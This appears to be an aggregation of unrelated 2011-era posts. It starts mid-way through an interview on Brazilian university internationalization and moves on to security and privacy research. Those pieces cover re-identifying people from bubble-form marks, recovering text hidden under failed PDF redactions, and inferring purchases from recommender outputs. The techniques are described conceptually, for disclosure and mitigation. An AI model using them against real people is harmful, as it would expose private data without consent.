Being German I have not experienced being a foreign student or researcher here. But here are some impressions: When I started teaching at Paderborn University which is a young (funded in 1972) mid-sized (15.000 students) university in a small town, the first time I walked across campus, I heard Indian, Vietnamese, Chinese, Arabic, Turkish and Spanish. At USP during the entire year I never heard anything but Portuguese, except in the language course where there were people from other Latin American countries, two women from Spain and one visiting researcher from the US. Staff at Paderborn is less international, but once or twice a week there is a presentation by a guest speaker from a university in Europe or beyond.
This is anecdotal, of course. I’m sure objective numbers would show a different picture. The Centrum für Hochschulentwicklung (CHE) does a regular ranking of German universities. It includes their international orientation. This year’s result: the business faculties at universities of applied science are leading with 50%. Only 35% of universities got ranked as being internationally oriented, with sociology and political sciences being the weakest. http://www.che-ranking.de/
I wonder how Brazilian universities would rank by the same standards.
c) Do you think there is a connection between innovation and foreign students at local universities?
No doubt about it. I did see an international orientation is two forms: 1. People read the international literature in the fields I’m interested in in. But without having actual people to enter into a dialogue with this often remains a reproduction or at best an application of innovations to Brazil. 2. People travel and study abroad. A few students and professors travel extensively. Some students from our group went to Bolivia, Mozambique, France during my year there. So there is a certain internationalization „from Brazil” but my overwhelming impression was that there is very little academic internationalization „of Brazil.”
Interview with João Victor Issler
Joao Victor Issler is an economics professor at the Fundacao Getulio Vargas Graduate School of Economics, who has been been closely following the recent internationalization efforts. His full bio here.
a) How do you see the presence of international students and faculty at the Brazilian universities?
The presence of of both is quite rare. There are a few isolated efforts here and there by a few groups. For example, in Economics, we have PUC-Rio (Pontifical Catholic University at Rio) in Economics and IMPA (National Institute for Pure and Applied Mathematics) who have at their masters and Ph.D. level students from Argentina, Chile, Peru etc. Our school, EPGE (FGV Graduate Scool of Economics) hires professors outside Brazil, but we do not have specific incentives for international students. Beyond Economics, I know that the University of Sao Paulo is seeking to attract international students, but it is hard to tell at what schools and how many
b) Foxcoon announced it will open a new plant in Brazil, and will hire 20,000 engineers for that. We clearly don´t have that many engineers. Do you think that the internationalization of universities could help the country to build better capacity for developing its tech-industry?
These numbers announced cannot be trusted. In any way, the general perception is that there is a deficit of engineers in Brazil. The tech-market, however, is an endogenous variable, correlated to our GDP per capita, the level of education of the working force, number of houses with access to drinkable water, infrastructure, etc. Inasmuch as Brazil develops economically, it will inexorably increase the openness of the university system. I am not saying that there should not be specific initiatives to increase internationalization, but an isolated process will be limited. More important than the internationalization of students and faculty is opening the economy to commerce and finance, a process that will directly affect long-term economic development and all its variables: education, innovation and the work force.
c) In other countries, there are institutions such as the Goethe Institute, or the Humboldt Foundation in Germany, that end up attracting international talents. The same goes for the US, with the Fulbright program. Why not in Brazil?
Germany and other European countries face problems due to the shape of their age demographic pyramid, whose base is small compared to the top. They have a better capacity to offer places in the university, that go beyond German students. Thus, it is possible to attract international students, in order to fill the present capacity. It is hard to say how this structure will evolve. They might reduce the installed capacity, or increase the search for international students. And they are looking for Brazilian students, for instance, especially engineers. Generally, developed countries tend to attract good students (and wealthier) than the developing countries, what explains this movement towards Germany, the US or Canada. To me, the US are the most important model regarding the higher education industry. In the beginning of the 20th Century, there were already many Japanes and Chinese students at universities in the US and Europe. With the development of Japan, this movement decreased in the end of the Century. Brazil today (for instance, the University of Sao Paulo) attrachs a few good students from Latin America. And it could attract more if we develop faster than the rest of the region. In Brazil, CAPES (for which I was an advisor until recently) plays a similar role than the institutions you mentioned. They are engaged in several bilateral agreements for students and professors. This openness is certainly positive. For students and professors, it is important to consider the hierarchy and quality: the best students tend to go to the US and Europe. We end up with the midle, and others go to countries where the development level is lower. As I mentioned, I don’t believe it is possible to change this pattern unilaterally, unless we want to apply huge public resources on that. In my view, it is not a priority, given the current levels of subsidies already applied to higher education in comparison with fundamental education in Brazil.
d) In your opinion, and considering the experience of EPGE, what are the advantages or disadvantages of increasing interationalization at Brazilian universities? Would that reduce space for Brazilians?
Increasing the universe of choice always improves the final results. Therefore, I see only advantages and I don’t see how we can be against internationalization. However, as I mentioned, I believe that an unilateral process will be limited to change higher education in Brazil (and also its impact on innovation and technology). Openning universities might not reduce the places for Brazilians, provided it is an organized and planned movement, correlated to our development level. If it is unilateral, then there can be indeed a loss for Brazilian students and professors.
e) Finally, do you see a relation between innovation and the internationalization of universities?
Yes, I do think the relation is positive between the two variables, but I don’t think it is possible to take any of them as isolated variables.
While still in beta Rafael Rivera (Within Windows blogger) worked with Paul Paliath at Infinite Apple to analyze iCloud traffic:
Last week, we posted some screenshots showing what appeared to be Apple’s new iCloud-backed iMessage using Azure (and Amazon) services for hosting. Since then, GigaOM ran the screenshots through three “cloud and networking experts at major companies” and the trio dismissed our claims.
Looking at the screenshots, it’s obvious Charles was used to dump iCloud traffic. Working with Within Windows blogger Rafael Rivera, we were able to set up a similar configuration with proper SSL sniffing capabilities — a set up that cloud and networking experts could have set up in minutes.
We sent an image from and to iPhones running a beta copy of iOS 5. The resulting traffic showed, quite clearly, the use of Azure services for hosting purposes. We don’t believe iCloud stores actual content. Rather, it simply manages links to uploaded content.
Full story and opinion at Paul Thurrott’s blog:
Confirmed Apple iCloud Does Not Stand Alone - SuperSite BlogMicrosoft saw a sharp drop in malware infections that exploit a widely abused Windows Autorun feature almost immediately after it was automatically disabled in earlier versions of the operating system.…
Earlier this week, Facebook expanded the roll-out of its facial recognition software to tag people in photos uploaded to the social networking site. Many observers and regulators responded with privacy concerns; EFF offered a video showing users how to opt-out.
Tim O'Reilly, however, takes a different tack:
Face recognition is here to stay. My question is whether to pretend that it doesn't exist, and leave its use to government agencies, repressive regimes, marketing data mining firms, insurance companies, and other monolithic entities, or whether to come to grips with it as a society by making it commonplace and useful, figuring out the downsides, and regulating those downsides.
...We need to move away from a Maginot-line like approach where we try to put up walls to keep information from leaking out, and instead assume that most things that used to be private are now knowable via various forms of data mining. Once we do that, we start to engage in a question of what uses are permitted, and what uses are not.
O'Reilly's point --and face-recognition technology -- is bigger than Facebook. Even if Facebook swore off the technology tomorrow, it would be out there, and likely used against us unless regulated. Yet we can't decide on the proper scope of regulation without understanding the technology and its social implications.
By taking these latent capabilities (Riya was demonstrating them years ago; the NSA probably had them decades earlier) and making them visible, Facebook gives us more feedback on the privacy consequences of the tech. If part of that feedback is "ick, creepy" or worse, we should feed that into regulation for the technology's use everywhere, not just in Facebook's interface. Merely hiding the feature in the interface, while leaving it active in the background would be deceptive: it would give us a false assurance of privacy. For all its blundering, Facebook seems to be blundering in the right direction now.
Compare the furor around Dropbox's disclosure "clarification". Dropbox had claimed that "All files stored on Dropbox servers are encrypted (AES-256) and are inaccessible without your account password," but recently updated that to the weaker assertion: "Like most online services, we have a small number of employees who must be able to access user data for the reasons stated in our privacy policy (e.g., when legally required to do so)." Dropbox had signaled "encrypted": absolutely private, when it meant only relatively private. Users who acted on the assurance of complete secrecy were deceived; now those who know the true level of relative secrecy can update their assumptions and adapt behavior more appropriately.
Privacy-invasive technology and the limits of privacy-protection should be visible. Visibility feeds more and better-controlled experiments to help us understand the scope of privacy, publicity, and the space in between (which Woody Hartzog and Fred Stutzman call "obscurity" in a very helpful draft). Then, we should implement privacy rules uniformly to reinforce our social choices.
The security of Google Android has once again been called into question after an academic researcher discovered 12 malicious apps hosted in the operating system's official applications market, some that had been hosted there for months and racked up hundreds of thousands of downloads.…
Updated Sophos has apologised after its security screening technology went awry and began falsely warning users when they visited websites running Google Analytics.…
A PC repair technician has been charged with planting spyware on the machines of clients as part of a ruse designed to capture pictures of them in various states of undress.…
Advance Notification Service information on 16 bulletins (nine Critical in severity, seven Important) addressing 34 vulnerabilities in Microsoft Windows, Microsoft Office, Internet Explorer, .NET, SQL, Visual Studios, Silverlight and ISA. All bulletins will be released on Tuesday, June 14, at approximately 10am PDT. Come back to this blog on Tuesday for our official risk and impact analysis, along with deployment guidance and a video overview of the release.
One of the issues we start to address in this release is “cookiejacking,” which allows an attacker to steal cookies from a user’s computer and access websites the user has logged into. The Internet Explorer bulletin will address one of the known vectors to the cookie folder. Given the prevalence of other types of social engineering methods in use by criminals, which provide access to much more than cookies, we believe this issue poses lower risk to customers. Further, based on a signature that has been released to millions of Microsoft Security Essentials and Forefront customers, the Microsoft Malware Protection Center (MMPC) has not detected attempts to use this technique.
June Advance Notification Service
Today, Joe Calandrino, Ed Felten and I are releasing a new result regarding the anonymity of fill-in-the-bubble forms. These forms, popular for their use with standardized tests, require respondents to select answer choices by filling in a corresponding bubble. Contradicting a widespread implicit assumption, we show that individuals create distinctive marks on these forms, allowing use of the marks as a biometric. Using a sample of 92 surveys, we show that an individual's markings enable unique re-identification within the sample set more than half of the time. The potential impact of this work is as diverse as use of the forms themselves, ranging from cheating detection on standardized tests to identifying the individuals behind “anonymous” surveys or election ballots.
If you've taken a standardized test or voted in a recent election, you’ve likely used a bubble form. Filling in a bubble doesn't provide much room for inadvertent variation. As a result, the marks on these forms superficially appear to be largely identical, and minor differences may look random and not replicable. Nevertheless, our work suggests that individuals may complete bubbles in a sufficiently distinctive and consistent manner to allow re-identification. Consider the following bubbles from two different individuals:
![]() |
![]() |
These individuals have visibly different stroke directions, suggesting a means of distinguishing between both individuals. While variation between bubbles may be limited, stroke direction and other subtle features permit differentiation between respondents. If we can learn an individual's characteristic features, we may use those features to identify that individual's forms in the future.
To test the limits of our analysis approach, we obtained a set of 92 surveys and extracted 20 bubbles from each of those surveys. We set aside 8 bubbles per survey to test our identification accuracy and trained our model on the remaining 12 bubbles per survey. Using image processing techniques, we identified the unique characteristics of each training bubble and trained a classifier to distinguish between the surveys’ respondents. We applied this classifier to the remaining test bubbles from a respondent. The classifier orders the candidate respondents based on the perceived likelihood that they created the test markings. We repeated this test for each of the 92 respondents, recording where the correct respondent fell in the classifier’s ordered list of candidate respondents.
If bubble marking patterns were completely random, a classifier could do no better than randomly guessing a test set’s creator, with an expected accuracy of 1/92 ≈ 1%. Our classifier achieves over 51% accuracy. The classifier is rarely far off: the correct answer falls in the classifier’s top three guesses 75% of the time (vs. 3% for random guessing) and its top ten guesses more than 92% of the time (vs. 11% for random guessing). We conducted a number of additional experiments exploring the information available from marked bubbles and potential uses of that information. See our paper for details.
Additional testing---particularly using forms completed at different times---is necessary to assess the real-world impact of this work. Nevertheless, the strength of these preliminary results suggests both positive and negative implications depending on the application. For standardized tests, the potential impact is largely positive. Imagine that a student takes a standardized test, performs poorly, and pays someone to repeat the test on his behalf. Comparing the bubble marks on both answer sheets could provide evidence of such cheating. A similar approach could detect third-party modification of certain answers on a single test.
The possible impact on elections using optical scan ballots is more mixed. One positive use is to detect ballot box stuffing---our methods could help identify whether someone replaced a subset of the legitimate ballots with a set of fraudulent ballots completed by herself. On the other hand, our approach could help an adversary with access to the physical ballots or scans of them to undermine ballot secrecy. Suppose an unscrupulous employer uses a bubble form employment application. That employer could test the markings against ballots from an employee’s jurisdiction to locate the employee’s ballot. This threat is more realistic in jurisdictions that release scans of ballots.
Appropriate mitigation of this issue is somewhat application specific. One option is to treat surveys and ballots as if they contain identifying information and avoid releasing them more widely than necessary. Alternatively, modifying the forms to mask marked bubbles can remove identifying information but, among other risks, may remove evidence of respondent intent. Any application demanding anonymity requires careful consideration of options for preventing creation or disclosure of identifying information. Election officials in particular should carefully examine trade-offs and mitigation techniques if releasing ballot scans.
This work provides another example in which implicit assumptions resulted in a failure to recognize a link between the output of a system (in this case, bubble forms or their scans) and potentially sensitive input (the choices made by individuals completing the forms). Joe discussed a similar link between recommendations and underlying user transactions two weeks ago. As technologies advance or new functionality is added to systems, we must explicitly re-evaluate these connections. The release of scanned forms combined with advances in image analysis raises the possibility that individuals may inadvertently tie themselves to their choices merely by how they complete bubbles. Identifying such connections is a critical first step in exploiting their positive uses and mitigating negative ones.
This work will be presented at the 2011 USENIX Security Symposium in August.
A Rustock botnet suspect has aspirations to work at Google, according to a nice piece of cyber-sleuthing by ex-Washington Post reporter Brian Krebs.…
It’s historically been the case that papers published in an IEEE or ACM conference or journal must have their copyrights assigned to the IEEE or ACM, respectively. Most of us were happy with this sort of arrangement, but the new IEEE policy seems to apply more restrictions on this process. Matt Blaze blogged about this issue in particular detail.
The IEEE policy and the comparable ACM policy appear to be focused on creating revenue opportunities for these professional societies. Hypothetically, that income should result in cost savings elsewhere (e.g., lower conference registration fees) or in higher quality member services (e.g., paying the expenses of conference program committee members to attend meetings). In practice, neither of these are true. Regardless, our professional societies work hard to keep a paywall between our papers and their readership. Is this sort of behavior in our best interests? Not really.
What benefits the author of an academic paper? In a word, impact. Papers that are more widely read are more widely influential. Furthermore, widely read papers are more widely cited; citation counts are explicitly considered in hiring, promotion, and tenure cases. Anything that gets in the way of a paper’s impact is something that damages our careers and it’s something we need to fix.
There are three common solutions. First, we ignore the rules and post copies of our work on our personal, laboratory, and/or departmental web pages. Virtually any paper written in the past ten years can be found online, without cost, and conveniently cataloged by sites like Google Scholar. Second, some authors I’ve spoken to will significantly edit the copyright assignment forms before submitting them. Nobody apparently ever notices this. Third, some professional societies, notably the USENIX Association, have changed their rules. The USENIX policy completely inverts the relationship between author and publisher. Authors grant USENIX certain limited and reasonable rights, while the authors retain copyright over their work. USENIX then posts all the papers on its web site, free of charge; authors are free to do the same on their own web sites.
(USENIX ensures that every conference proceedings has a proper ISBN number. Every USENIX paper is just as “published” as a paper in any other conference, even though printed proceedings are long gone.)
Somehow, the sky hasn’t fallen. So far as I know, the USENIX Association’s finances still work just fine. Perhaps it’s marginally more expensive to attend a USENIX conference, but then the service level is also much higher. The USENIX professional staff do things that are normally handled by volunteer labor at other conferences.
This brings me to the vote we had last week at the IEEE Symposium on Security and Privacy (the “Oakland” conference) during the business meeting. We had an unusually high attendance (perhaps 150 out of 400 attendees) as there were a variety of important topics under discussion. We spent maybe 15 minutes talking about the IEEE’s copyright policy and the resolution before the room was should we reject the IEEE copyright policy and adopt the USENIX policy? Ultimately, there were two “no” votes and everybody else voted “yes.” That’s an overwhelming statement.
The question is what happens next. I’m planning to attend ACM CCS this October in Chicago and I expect we can have a similar vote there. I hope similar votes can happen at other IEEE and ACM conferences. Get it on the agenda of your business meetings. Vote early and vote often! I certainly hope the IEEE and ACM agree to follow the will of their membership. If the leadership don’t follow the membership, then we’ve got some more interesting problems that we’ll need to solve.
Sidebar: ACM and IEEE make money by reselling our work, particularly with institutional subscriptions to university libraries and large companies. As an ACM or IEEE member, you also get access to some, but not all, of the online library contents. If you make everything free (as in free beer), removing that revenue source, then you’ve got a budget hole to fill. While I’m no budget wizard, it would make sense for our conference registration fees to support the archival online storage of our papers. Add in some online advertising (example: startup companies, hungry to hire engineers with specialized talents, would pay serious fees for advertisements adjacent to research papers in the relevant areas), and I’ll bet everything would work out just fine.
After years of work, the world is making a step forward to letting authors own and control their own documents, instead of having them controlled by office document software vendors.
Historically, every office document suite has stored data in its own incompatible format, locking users into that suite and inhibiting competition. This lack of a free and open office document format also makes a lie out of archiving; storing the bits is irrelevant because formats change over time in undocumented ways, with the result that later programs often cannot read older files (we can still read the Magna Carta, but some powerpoint files I created only 15 years ago cannot be read by current versions of Microsoft Office). Governments in particular should not have their documents beholden to any supplier; important government documents should be available to future generations.
Thankfully, the OASIS Open Document Format for Office Applications (OpenDocument) Technical Committee (TC) is wrapping up its update of the OpenDocument standard, and I think they are about to complete the new version 1.2. This standard lets people store and exchange editable office documents so they edited by programs made by different suppliers. This will enable real competition, and enable future generations to read the materials we develop today. The TC has already approved OpenDocument v1.2 as a Committee Specification, and at this point I think the odds are excellent that it will get through the rest of the process and become formally approved.
One of the big improvements, from my point of view, is that the TC has successfully defined how to store and exchange recalculated formulas in office documents. That was my goal for joining the TC years ago, and I’m delighted to have played a part in this update. Since it looks like it’s on its way to success, I plan to step down as chair of the OASIS Office formula subcommittee and to leave the TC. I am very grateful to everyone who helped — thank you. For those who aren’t familiar with the story of the formula subcommittee, please let me give a brief background.
Years ago I was delighted to see a standard way to store office documents and exchange them between different suppliers’ products: OASIS Open Document Format for Office Applications (OpenDocument). People around the world create office documents, so this is a standard the world really needed!! However, I was deeply troubled when I discovered that this specification did not include a standard way to exchange recalculated formulas, such as those used in spreadsheets. I thought this was an important weakness in the specification. So I talked to others to see what could be done, and started work that might fill this void, including recruiting people to help.
I am delighted to report that we now have a specification for formulas: OpenFormula, part 2 of the current draft of the OpenDocument standard. Now the world has a standard, developed by multiple suppliers, that lets people store office documents for future generations and exchange office documents between different suppliers’ products, that includes recalculated formulas. And it’s not just a spec; people are already implementing it (which is good; only implemented specs have value). There are still some procedural steps, but I have high hopes that at this point we are essentially done.
This work was not done by just me, of course, or even primarily by me. A vast number of people worked directly and behind the scenes to make it happen. I cannot possibly list them all. I can, however, express my great gratitude to them. Thank you, thank you, thank you. You — and there are many of you — have made this a success. Again, thank you so very much.
The reason I joined the OASIS technical committee (TC) was to help create this formula specification and turn it into a reality. Making a real standard, one agreed on by multiple parties, takes a lot of work. We developers of the formula specification discussed details such as what 0 to the 0 power should mean, date basis systems, unit systems, and many other details like that, because addressing detailed issues is necessary to create a good standard. We had to nail down evaluation order and determine that a light-year is the distance light travels in exactly 365.25 days. And so on. We got a lot of participation by various spreadsheet suppliers; implementers even changed their implementations to conform with the draft spec as it was being developed! This work took time, but the point was to create a specification people would actually use, not just put on a shelf, and that made the extra time worth it. If you are interested in learning more, feel free to listen to The ODF Podcast 004: David A. Wheeler on OpenFormula (an interview of me by Rob Weir).
Now, finally, that work appears to be done. As I noted, there are a few procedural steps before the current specification becomes an official standard; change is always possible. Also, I’m sure there will be clarifications and additions over time, as with any standard in use. But at this point, I think my goal has been accomplished, and I am grateful.
So, I think now is a good time for me to make a graceful exit from the TC. After all, my goal has been accomplished. So, I intend to step down as subcommittee chair of the formula subcommittee and to leave the TC. Technically there are still some procedural steps and there’s a potential for issues; if there’s a need for me help to wrap up something, I’ll do so. But I think things are concluding, so it’s a good time to say so.
I think the effort to specify spreadsheet formulas has been a great success. We got a lot accomplished. Most importantly, we got something important accomplished for the world. Thank you, everyone who helped.
Since we launched RECAP a couple of years ago, one of our top concerns has been privacy. The federal judiciary's PACER system offers the public online access to hundreds of millions of court records. The judiciary's rules require each party in a case to redact certain types of information from documents they submit, but unfortunately litigants and their counsel don't always comply with these rules. Three years ago, Carl Malamud did a groundbreaking audit of PACER documents and found more than 1600 cases in which litigants submitted documents with unredacted Social Security numbers. My recent research has focused on a different problem: cases where parties tried to redact sensitive information but the redactions failed for technical reasons. This problem occasionally pops up in news stories, but as far as I know, no one has conducted a systematic study.
To understand the problem, it helps to know a little bit about how computers represent graphics. The simplest image formats are bitmap or raster formats. These represent an image as an array of pixels, with each pixel having a color represented by a numeric value. The PDF format uses a different approach, known as vector graphics, that represent an image as a series of drawing commands: lines, rectangles, lines of text, and so forth.
Vector graphics have important advantages. Vector-based formats "scale up" gracefully, in contrast to the raster images that look "blocky" at high resolutions. Vector graphics also do a better job of preserving a document's structure. For example, text in a PDF is represented by a sequence of explicit text-drawing commands, which is why you can cut and paste text from a PDF document, but not from a raster format like PNG.
But vector-based formats also have an important disadvantage: they may contain more information than is visible to the naked eye. Raster images have a "what you see is what you get" quality—changing all the pixels in a particular region to black destroys the information that was previously in that part of the image. But a vector-based image can have multiple "layers." There might be a command to draw some text followed by a command to draw a black rectangle over the text. The image might look like it's been redacted, but the text is still "under" the box. And often extracting that information is a simple matter of cutting and pasting.
So how many PACER documents have this problem? We're in a good position to study this question because we have a large collection of PACER documents—1.8 million of them when I started my research last year. I wrote software to detect redaction rectangles—it turns out these are relatively easy to recognize based on their color, shape, and the specific commands used to draw them. Out of 1.8 million PACER documents, there were approximately 2000 documents with redaction rectangles. (There were also about 3500 documents that were redacted by replacing text by strings of Xes, I also excluded documents that were redacted by Carl Malamud before he donated them to our archive.)
Next, my software checked to see if these redaction rectangles overlapped with text. My software identified a few hundred documents that appeared to have text under redaction rectangles, and examining them by hand revealed 194 documents with failed redactions. The majority of the documents (about 130) appear be from commercial litigation, in which parties have unsuccessfully attempted to redact trade secrets such as sales figures and confidential product information. Other improperly redacted documents contain sensitive medical information, addresses, and dates of birth. Still others contain the names of witnesses, jurors, plaintiffs, and one minor.
PACER reportedly contains about 500 million documents. We don't have a random sample of PACER documents, so we should be careful about trying to extrapolate to the entire PACER corpus. Still, it's safe to say there are thousands, and probably tens of thousands, of documents in PACER whose authors made unsuccessful attempts to conceal information.
It's also important to note that my software may not be detecting every instance of redaction failures. If a PDF was created by scanning in a paper document (as opposed to generated directly from a word processor), then it probably won't have a "text layer." My software doesn't detect redaction failures in this type of document. This means that there may be more than 194 failed redactions among the 1.8 million documents I studied.
A few weeks ago I wrote a letter to Judge Lee Rosenthal, chair of the federal judiciary's Committee on Rules of Practice and Procedure, explaining this problem. In that letter I recommend that the courts themselves use software like mine to automatically scan PACER documents for this type of problem. In addition to scanning the documents they already have, the courts should make it a standard part of the process for filing new documents with the courts. This would allow the courts to catch these problems before the documents are made available to the public on the PACER website.
My code is available here. It's experimental research code, not a finished product. We're releasing it into the public domain using the CC0 license; this should make it easy for federal and state officials to adapt it for their own use. Court administrators who are interested in adapting the code for their own use are especially encouraged to contact me for advice and assistance. The code relies heavily on the CAM::PDF Perl library, and I'm indebted to Chris Dolan for his patient answers to my many dumb questions.
So what should litigants do to avoid this problem? The National Security Agency has a good primer on secure redaction. The approach they recommend—completely deleting sensitive information in the original word processing document, replacing it with innocuous filler (such as strings of XXes) as needed, and then converting it to a PDF document, is the safest approach. The NSA primer also explains how to check for other potentially sensitive information that might be hidden in a document's metadata.
Of course, there may be cases where this approach isn't feasible because a litigant doesn't have the original word processing document or doesn't want the document's layout to be changed by the redaction process. Adobe Acrobat's redaction tool has worked correctly when we've used it, and Adobe probably has the expertise to do it correctly. There may be other tools that work correctly, but we haven't had an opportunity to experiment with them so we can't say which ones they might be.
Regardless of the tool used, it's a good idea to take the redacted document and double-check that the information was removed. An easy way to do this is to simply cut and paste the "redacted" content into another document. If the redaction succeeded, no text should be transferred. This method will catch most, but not all, redaction failures. A more rigorous check is to remove the redaction rectangles from the document and manually observe what's underneath them. One of the scripts I'm releasing today, called remove_rectangles.pl, does just that. In its current form, it's probably not user-friendly enough for non-programmers to use, but it would be relatively straightforward for someone (perhaps Adobe or the courts) to build a user-friendly version that ordinary users could use to verify that the document they just attempted to redact actually got redacted.
One approach we don't endorse is printing the document out, redacting it with a black marker, and then re-scanning it to PDF format. Although this may succeed in removing the sensitive information, we don't recommend this approach because it effectively converts the document into a raster-based image, destroying useful information in the process. For example, it will no longer be possible to cut and paste (non-redacted) text from a document that has been redacted in this way.
Bad redactions are not a new problem, but they are taking on a new urgency as PACER documents become increasingly available on the web. Correct redaction is not difficult, but it does require both knowledge and care by those who are submitting the documents. The courts have several important roles they should play: educating attorneys about their redaction responsibilities, providing them with software tools that make it easy for them to comply, and monitoring submitted documents to verify that the rules are being followed.
This research was made possible with the financial support of Carl Malamud's organization, Public.Resource.Org.
Attachment | Size |
---|---|
rosenthal_redacted.pdf | 138.38 KB |
Ann Kilzer, Arvind Narayanan, Ed Felten, Vitaly Shmatikov, and I have released a new research paper detailing the privacy risks posed by collaborative filtering recommender systems. To examine the risk, we use public data available from Hunch, LibraryThing, Last.fm, and Amazon in addition to evaluating a synthetic system using data from the Netflix Prize dataset. The results demonstrate that temporal changes in recommendations can reveal purchases or other transactions of individual users.
To help users find items of interest, sites routinely recommend items similar to a given item. For example, product pages on Amazon contain a "Customers Who Bought This Item Also Bought" list. These recommendations are typically public, and they are the product of patterns learned from all users of the system. If customers often purchase both item A and item B, a collaborative filtering system will judge them to be highly similar. Most sites generate ordered lists of similar items for any given item, but some also provide numeric similarity scores.
Although item similarity is only indirectly related to individual transactions, we determined that temporal changes in item similarity lists or scores can reveal details of those transactions. If you're a Mozart fan and you listen to a Justin Bieber song, this choice increases the perceived similarity between Justin Bieber and Mozart. Because similarity lists and scores are based on perceived similarity, your action may result in changes to these scores or lists.
Suppose that an attacker knows some of your past purchases on a site: for example, past item reviews, social networking profiles, or real-world interactions are a rich source of information. New purchases will affect the perceived similarity between the new items and your past purchases, possibility causing visible changes to the recommendations provided for your previously purchased items. We demonstrate that an attacker can leverage these observable changes to infer your purchases. Among other things, these attacks are complicated by the fact that multiple users simultaneously interact with a system and updates are not immediate following a transaction.
To evaluate our attacks, we use data from Hunch, LibraryThing, Last.fm, and Amazon. Our goal is not to claim privacy flaws in these specific sites (in fact, we often use data voluntarily disclosed by their users to verify our inferences), but to demonstrate the general feasibility of inferring individual transactions from the outputs of collaborative filtering systems. Among their many differences, these sites vary dramatically in the information that they reveal. For example, Hunch reveals raw item-to-item correlation scores, but Amazon reveals only lists of similar items. In addition, we examine a simulated system created using the Netflix Prize dataset. Our paper outlines the experimental results.
While inference of a Justin Bieber interest may be innocuous, inferences could expose anything from dissatisfaction with a job to health issues. Our attacks assume that a victim reveals certain past transactions, but users may publicly reveal certain transactions while preferring to keep others private. Ultimately, users are best equipped to determine which transactions would be embarrassing or otherwise problematic. We demonstrate that the public outputs of recommender systems can reveal transactions without user knowledge or consent.
Unfortunately, existing privacy technologies appear inadequate here, failing to simultaneously guarantee acceptable recommendation quality and user privacy. Mitigation strategies are a rich area for future work, and we hope to work towards solutions with others in the community.
Worth noting is that this work suggests a risk posed by any feature that adapts in response to potentially sensitive user actions. Unless sites explicitly consider the data exposed, such features may inadvertently leak details of these underlying actions.
Our paper contains additional details. This work was presented earlier today at the 2011 IEEE Symposium on Security and Privacy. Arvind has also blogged about this work.
This guest post is from Nick Doty, of the W3C and UC Berkeley School of Information. As a companion post to my summary of the position papers submitted for last month's W3C Do-Not-Track Workshop, hosted by CITP, Nick goes deeper into the substance and interaction during the workshop.
The level of interest and participation in last month's Workshop on Web Tracking and User Privacy — about a hundred attendees spanning multiple countries, dozens of companies, a wide variety of backgrounds — confirms the broad interest in Do Not Track. The relatively straightforward technical approach with a catchy name has led to, in the US, proposed legislation at both the state and federal level and specific mention by the Federal Trade Commission (it was nice to have Ed Felten back from DC representing his new employer at the workshop), and comparatively rapid deployment of competing proposals by browser vendors. Still, one might be surprised that so many players are devoting such engineering resources to a relatively narrow goal: building technical means that allow users to avoid tracking across the Web for the purpose of compiling behavioral profiles for targeted advertising.
In fact, Do Not Track (in all its variations and competing proposals) is the latest test case for how new online technologies will address privacy issues. What mix of minimization techniques (where one might classify Microsoft's Tracking Protection block lists) versus preference expression and use limitation (like a Do Not Track header) will best protect privacy and allow for innovation? Can parties agree on a machine-readable expression of privacy preferences (as has been heavily debated in P3P, GeoPriv and other standards work), and if so, how will terms be defined and compliance monitored and enforced? Many attendees were at the workshop not just to address this particular privacy problem — ubiquitous invisible tracking of Web requests to build behavioral profiles — but to grab a seat at the table where the future of how privacy is handled on the Web may be decided. The W3C, for its part, expects to start an Interest Group to monitor privacy on the Web and spin out specific work as new privacy issues inevitably arise, in addition to considering a Working Group to address this particular topic (more below). The Internet Engineering Task Force (IETF) is exploring a Privacy Directorate to provide guidance on privacy considerations across specs.
At a higher level, this debate presents a test case for the process of building consensus and developing standards around technologies like tracking protection or Do Not Track that have inspired controversy. What body (or rather, combination of bodies) can legitimately define preference expressions that must operate at multiple levels in the Web stack, not to mention serve the diverse needs of individuals and entities across the globe? Can the same organization that defines the technical design also negotiate semantic agreement between very diverse groups on the meaning of "tracking"? Is this an appropriate role for technical standards bodies to assume? To what extent can technical groups work with policymakers to build solutions that can be enforced by self-regulatory or governmental players?
Discussion at the recent workshop confirmed many of these complexities: though the agenda was organized to roughly separate user experience, technical granularity, enforcement and standardization, overlap was common and inevitable. Proposals for an "ack" or response header brought up questions of whether the opportunity to disclaim following the preference would prevent legal enforcement; whether not having such a response would leave users confused about when they had opted back in; and how granular such header responses should be. In defining first vs. third party tracking, user expectations, current Web business models and even the same-origin security policy could point the group in different directions.
We did see some moments of consensus. There was general agreement that while user interface issues were key to privacy, trying to standardize those elements was probably counterproductive but providing guidance could help significantly. Regarding the scope of "tracking", the group was roughly evenly divided on what they would most prefer: a broad definition (any logging), a narrow definition (online behavioral advertising profiling only) or something in between (where tracking is more than OBA but excludes things like analytics or fraud protection, as in the proposal from the Center for Democracy and Technology). But in a "hum" to see which proposals workshop attendees opposed ("non-starters") no one objected to starting with a CDT-style middle ground — a rather shocking level of agreement to end two days chock full of debate.
For tech policy nerds, then, this intimate workshop about a couple of narrow technical proposals was heady stuff. And the points of agreement suggest that real interoperable progress on tracking protection — the kind that will help the average end user's privacy — is on the way. For the W3C, this will certainly be a topic of discussion at the ongoing meeting in Bilbao, and we're beginning detailed conversations about the scope and milestones for a Working Group to undertake technical standards work.
Thanks again to Princeton/CITP for hosting the event, and to Thomas and Lorrie for organizing it: bringing together this diverse group of people on short notice was a real challenge, and it paid off for all of us. If you'd like to see more primary materials: minutes from the workshop (including presentations and discussions) are available, as are the position papers and slides. And the W3C will post a workshop report with a more detailed summary very soon.
As reported in Fast Company, RichRelevance and Overstock.com teamed up to offer up to a $1,000,000 prize for improving "its recommendation engine by 10 percent or more."
If You Liked Netflix, You Might Also Like Overstock
When I first read a summary of this contest, it appeared they were following in Netflix's footsteps right down to releasing user data sans names. This did not end well for Netflix's users or for Netflix. Narayanan and Shmatikov were able to re-identify Netflix users using the contest dataset, and their research contributed greatly to Ohm's work on de-anonimization. After running the contest a second time, Netflix terminated it early in the face of FTC attention and a lawsuit that they settled out of court.
This time, Overstock is providing "synthetic data" to contest entrants, then testing submitted algorithms against unreleased real data. Tag line: "If you can't bring the data to the code, bring the code to the data." Hmm. An interesting idea, but short on a few details around the sharp edges that jump out as highest concern. I look forward to getting the time to play with the system and dataset. What is good news is seeing companies recognize privacy concerns and respond with something interesting and new. That is, at least, a move in the right direction.
Place your bets now on which happens first: a contest winner with a 10% boost to sales, or researchers finding ways to re-identify at least 10% of the data?
